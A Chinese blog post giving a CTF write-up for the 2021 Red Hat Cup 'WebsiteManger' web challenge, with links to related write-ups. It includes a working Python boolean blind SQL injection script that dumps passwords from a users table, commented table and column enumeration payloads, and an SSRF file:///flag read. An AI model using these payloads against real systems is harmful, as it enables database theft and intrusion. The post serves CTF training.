2021红帽杯 WebsiteManger

最新推荐文章于 2022-10-24 14:24:16 发布
最新推荐文章于 2022-10-24 14:24:16 发布
阅读量746 收藏 2
点赞数 1
分类专栏: # BUUCTF-Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/118118961
版权

2021红帽杯 WebsiteManger

考点

布尔盲注、SSRF

思路

尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上

在这里插入图片描述

当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点

在这里插入图片描述

猜测 flag在根目录下:file:///flag

在这里插入图片描述

Payload

盲注脚本

import string
import requests

allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

url = 'http://challenge-faceca08e0d9acf7.sandbox.ctfhub.com:10800/image.php'

flag=''
for i in range(1,100):
    length=len(flag)
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            break

        #payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))<{},sleep(0.5),1)".format(i,j)
        #payload="0/**/or/**/if(ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))<{},1,0)".format(i,j)
        #payload="0/**/or/**/if(ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users'),{},1))<{},1,0)".format(i,j)
        payload="0/**/or/**/if(ascii(substr((select/**/group_concat(password)from/**/users),{},1))<{},1,0)".format(i,j)
        params={
            'id':payload
        }
        r=requests.get(url=url,params=params)
        if len(r.text)>200:
            max=j
        else :
            min=j
H3rmesk1t
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1581
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
[2021红帽杯]Web writeup
Anton__1的博客
05-10 1730
find_it 老套路扫一下目录 貌似只有君子协定有用,打开看看 When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php 打开1ndexx.php 发现打不开, 尝试一下是否有备份 /.1ndexx.php.swp 发现了一串代码: <?php $link = mysql_connect('localhost', 'root'); ?> <html> <hea
CTFhub---WebsiteManger
jiet07的博客
11-09 2025
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 2857
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
红帽杯2021_web_部分
ScyLamb的博客
05-10 1271
find_it 首页没发现东西,尝试robots.txt 发现 1ndexx.php 但无法访问 1ndexx.php 尝试继续找信息泄露,最后找到 .1ndexx.php.swp <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-co
2021红帽杯web部分复现
1ance's blog
05-18 403
目录Webfind_itframeworkWebsiteMangerMisc签到 Web find_it 根据题目信息查看robots.txt,发现1ndexx.php 打开也没有啥,于是扫扫目录,发现hack.php 但是好像也没有东西。 继续分析,找找有没有备份文件。 芜湖~发现有.1ndexx.php.swp 拿到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <t
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
2019红帽杯恶臭的数据包.7z
11-11
2019红帽杯恶臭的数据包
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
红帽RHCSA的详尽笔记
08-15
红帽RHCSA的详尽笔记打算要考RHCSA然后报了一个班,这是我自己记录的笔记,我感觉挺详细的,希望对你们有帮助,包括配置网卡、yum源、创建用户、用户组、创建cron作业等等,可以搭配我的文章一起看,对初学Linux和考...
2021-第四届红帽杯网络安全大赛-Web-find_it
weixin_40872714的博客
03-26 2371
2021-第四届红帽杯网络安全大赛-Web-find_it 题目 先用目录扫描工具爆破一下目录,发现了robots.txt 访问后有了提示 1ndexx.php 直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。 http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp 把关键代码粘贴出来看一下运行流程 打开flag.php读取文件内容 打开hack.php文件,获取co
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9958
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
ctfhub-历年真题web-WebsiteManger
Ewige的博客
07-12 1591
ctfhub 历年真题 webWebsiteManger题目考点解题思路 WebsiteManger 题目考点 布尔盲注 SSRF 解题思路 进行登入点使用sqlmap 测试无果 仔细观察, 图片链接处存在注入点 使用sqlmap进行测试 sqlmap -u "http://challenge-94b51247b7b2ac6f.sandbox.ctfhub.com:10800/image.php?id=3" --tamper space2mysqlblank --technique=B --
CTFHUB WEBSITE WEBMANAGER 通关
qq_43338937的博客
09-11 337
考点 ssrf 布尔盲注 测试登录页面 username参数位置可以进行布尔盲注 手工测试 a" or sleep(2)--+ 参数使用post提交 保存数据包 利用sqlmap工具进行注入获取数据库 表 用户密码 python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db python3 sqlmap.py -r a.txt --data="username=
CTFHUB之Web安全—信息泄露
Lucky小小吴的小屋
10-24 3081
本模块有十道题 目录遍历 phpinfo 备份文件下载(4道) 网站源码 bak文件 vim缓存 .DS_Store Git泄露 SVN泄露 HG泄露
CTFHub-web详解
shayebudon的博客
11-20 3437
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
2021-RedHat-CTF-WP【WEB】
afei001
06-06 324
WEB 1.find_it:文件fuzz 代码审计 1.1 PHP代码分析 2.framework: Yii—CVE-2020-15148反序列化 2.1源码分析 3.WebsiteManger:布尔型盲注 4.easy cms for you WEB 1.find_it:文件fuzz 代码审计 拿到目标靶机,常规WEB渗透思路对目标进行信息搜集、端口探测、目录探测等等。目录探测在robots.txt文件中发现了信息。 告诉我们存在1ndexx.php,但是直接访...
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
红帽linux安装手册
最新发布
09-05
非抱歉,我无法提供完整的红帽Linux安装手册,因为我不能提供长篇大论的文档。 但是,我可以给你一些概述和基本步骤。 红帽Linux是一种流行的Linux发行版,它有一个官方的安装手册供用户参考。该手册通常包含详细的说明、屏幕截图和步骤,以帮助用户顺利进行安装。 一般来说,红帽Linux的安装过程可以分为以下几个步骤: 1. 下载镜像文件:首先,你需要从红帽官方网站上下载适合你的计算机架构的红帽Linux镜像文件。这通常是一个ISO文件。 2. 创建安装介质:将下载的ISO文件刻录到光盘或创建一个可引导的USB驱动器,以便你可以从它启动并开始安装过程。 3. 启动计算机:将光盘或USB驱动器插入计算机,然后重新启动计算机。确保计算机的BIOS设置允许从所选的介质启动。 4. 进入安装程序:计算机启动时,会进入红帽Linux的安装程序。你将被引导到一个图形化界面,其中包含安装选项和配置设置。 5. 配置安装选项:在安装程序中,你将需要选择语言、时区、键盘布局和其他系统配置选项。你可以按照屏幕上的指示进行选择和配置。 6. 磁盘分区和安装:接下来,你需要对硬盘进行分区,并选择要安装红帽Linux的位置。你可以选择自动分区或手动分区,具体取决于你的需求。 7. 安装和配置软件包:一旦分区完成,你将需要选择要安装的软件包。红帽Linux提供了不同的安装模式,可以根据你的需求选择基本系统、桌面环境、服务器工具等。 8. 设置用户和密码:在安装过程的某个阶段,你将需要设置一个管理员(root)用户和相应的密码,以及其他常规用户。 9. 完成安装:一旦安装程序完成,你将需要重新启动计算机,然后进入新安装的红帽Linux系统。 请注意,这只是一个简单的概述,红帽Linux的实际安装过程可能会根据版本和个人需求略有不同。为了获得更详细和准确的信息,我建议你参考红帽官方的安装手册或文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值